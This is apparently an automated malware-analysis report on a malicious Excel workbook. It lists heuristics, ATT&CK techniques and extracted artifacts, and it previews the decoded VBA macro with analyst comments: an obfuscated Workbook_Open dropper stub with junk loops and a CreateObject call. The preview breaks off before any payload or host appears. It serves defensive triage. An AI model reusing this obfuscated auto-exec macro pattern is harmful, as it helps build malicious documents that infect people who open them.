MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro, which runs automatically when the workbook is opened with macros enabled. The macro code uses a Shell() call and CreateObject, indicating it is designed to execute arbitrary code, likely to download and run a secondary payload. The VBA code is heavily obfuscated (randomized identifiers, junk declarations and loops that never execute), which makes it difficult to determine the exact payload or destination; hence the 'unknown family' classification.
Heuristics 6
- VBA macros detected (medium, 4 related findings) — OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) — OLE_VBA_SHELL: Shell() call in VBA
- Workbook_Open macro (high) — OLE_VBA_WBOPEN: Workbook_Open macro
- CreateObject call (high) — OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high) — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15799 bytes |

SHA-256: dccf55e3a98374352a3c1e7c4c454a4ea4dcf21099fb2820d2ccf8cf77b358f8

Detection
- ClamAV: No threats found (a signature scan result; it does not contradict the heuristic findings listed above)
- Obfuscation or payload: likely. Carved artifact contains 6 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: Workbook_Open event handler of the ThisWorkbook module. Excel
' invokes it automatically when the workbook is opened with macros enabled,
' so this is the sample's auto-execution entry point.
' The only statement with any effect is the call into module Xb5IWYK below;
' everything after it is padding that never runs.
Private Sub workbook_open()
' Hands control to procedure Kn1Qj1GkRHt8Ek_pgCaa in module Xb5IWYK. That
' procedure's body is not part of the visible preview, so what it does
' cannot be stated from this excerpt.
Xb5IWYK.Kn1Qj1GkRHt8Ek_pgCaa
' Junk code: each While condition compares two different integer literals and
' is therefore always False, so the loop body is never entered. The bodies
' hold only Dim declarations, and none of the declared names is referenced
' anywhere in this procedure.
While 9 = 4371
Dim VWrY_NOx_ESiuLftgJSRNw24B2K85OI3httw5ZQTjSkKxIK3DTHVrGKhdxW As Variant
Wend
Dim FCQ2s6YA_b As Integer
While 10 = 2477
Dim sxE29r5Kp_1oR3jEvIYhJQFCIQQZ1NWGJYSeCdsYPUwreatW As Variant
Wend
Dim PlIOkaPZpB As Integer
While 23 = 7052
Dim rpYcSaprc2hDCQZ9PxcXgrf4HN_GfsG3y_uB_vBUAv71xLi1xkIa6Qd9HeS As Variant
Wend
Dim UgJtsoNBeX9dvGV As Integer
While 28 = 7895
Dim tto_6oLR5ho7fev2db7_cjKFH7fUYloox5sMcYVYHMOKD As Variant
Wend
Dim rqfsecAyF3Hh As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Xb5IWYK"
' Analyst note: module-level String shared by the procedures of this module.
' The function that follows passes it to CreateObject as the class (ProgID)
' argument. No assignment to it appears in the visible preview, so the COM
' class being instantiated cannot be determined from this excerpt.
Dim PP1RiHGCTh67gWOwf8QQSa5gV5U2mQtF1rZrSWsHa3RqtdG_t_mVJw6yTS6mwNYBwyEy7fbGMHzYHMw1 As String
Function g59G13Q2_HkugWD_g1NT9CZN9l3GmzpBjo5dWPQT8SCiEtKFY(I8KiXLeX4A_5NhVxeIUYPRq_Jea1bV5kkWBIL8qYJ2_KsRExwcxgGcMzOJX3tn6g_bR1eLkgb6MXMdP2YmC8gVbFHK4Bixof5gEO9NQj2P_KNylt3ebEj79r9KqSQi7mOqbpX_2JTbEO)
While 4 = 2838
Dim pjS_ZZMLHdFRtPu4xgEhVG73UIIVTJj8LqmafynxWmnxGTAVSk9KwI As Variant
Wend
Dim dglYnOPz174GEC As Integer
While 24 = 5396
Dim mSV82QIrcHt_HvCrJWJCK_xEJWffup39N7s9NAR As Variant
Wend
Dim e9uDcnmFcwGue7C As Integer
While 28 = 7492
Dim geOwctm7vNuuJBDcIDnCY_SZgPCsl4WAJEKb8LxtTxQN315ar As Variant
Wend
Dim mkZR9ZfJxOLq3S1 As Integer
Dim Eup2j5eKVw3CEvUm8rc9WO2kgkMKDqJVEYt5_jBNeuUy7_agnmooUB6z3DS9qSGolf7pBZhWoMcl3BnbHofYAdADc4B_OBgKloLYGudM_Q9FhR6zYzyAvrnFd3LGXhFlpQ9MyMTVIRTrd3d
While 11 = 1428
Dim siDzje6N3qkr_foUj_9R6rKonQH7kCacYWIPzjG As Variant
Wend
Dim GnJXPxwEPizE2T As Integer
While 10 = 6925
Dim g4_WXJRU9lzOFRqVWd92zntS4zzJ2Vu7hH1bI As Variant
Wend
Dim aXyvoghApdX4KUE As Integer
While 14 = 8626
Dim c3IpbgTFcl12q8ZNKdCiBD9Kt3HTv7JXz As Variant
Wend
Dim gn8QbY3DqQCoo As Integer
Dim QiDSctSx3beWCifRDaRpLZ694BXnvfb95TX8_qEscDp_QHiucshsU_KzmDYZUnBU9eaqIhMUUhKHtzqubmJB8smzHhTAQnWyBS
While 12 = 3467
Dim SrDHqpQe8X475hW9TeZbBHRb6rDIeTu5e_iZPlN As Variant
Wend
Dim cESiNCSgzdDVvk As Integer
While 23 = 4821
Dim LmIXjL8lG_mm8az97qqO7UqhCYkJMnZ79SQaYApXP18S6kD2q1f As Variant
Wend
Dim Unem15jUJkwXbho As Integer
While 24 = 2839
Dim mmHXi5AQ9EWWlZTrcUFDQcoZexodwbbdtP8YsRQkS As Variant
Wend
Dim Vegcg84z2S As Integer
While 25 = 419
Dim BUdVI7r2tNfcem3mUb49JDes57G78zun5HYHN3xb_YfUw2 As Variant
Wend
Dim j4ka62G8ytaK As Integer
While 27 = 8663
Dim yu44c2hULtWama8tfH5C7MUDMSrB_aRdaklNek25SmpzfHw As Variant
Wend
Dim c3WZpxXNkX As Integer
While 24 = 9529
Dim ypHIeTuZ2_AxsN5O_sRfegDfMHl_loCVAzo5suwQ5XmHu As Variant
Wend
Dim oIHeYxo5_2Q As Integer
Set QiDSctSx3beWCifRDaRpLZ694BXnvfb95TX8_qEscDp_QHiucshsU_KzmDYZUnBU9eaqIhMUUhKHtzqubmJB8smzHhTAQnWyBS = CreateObject(PP1RiHGCTh67gWOwf8QQSa5gV5U2mQtF1rZrSWsHa3RqtdG_t_mVJw6yTS6mwNYBwyEy7fbGMHzYHMw1)
While 27 = 2701
Dim kl5VrtxL7nw2h9fM5AjF45th8cdK1WZ57VREyYiJiYJE1Pie2is4cuWp As Variant
Wend
Dim VXNNkUiM15JoY As Integer
While 22 = 2836
Dim XdZXfcsmpp38SPmeZK9kNbAT58
... (truncated)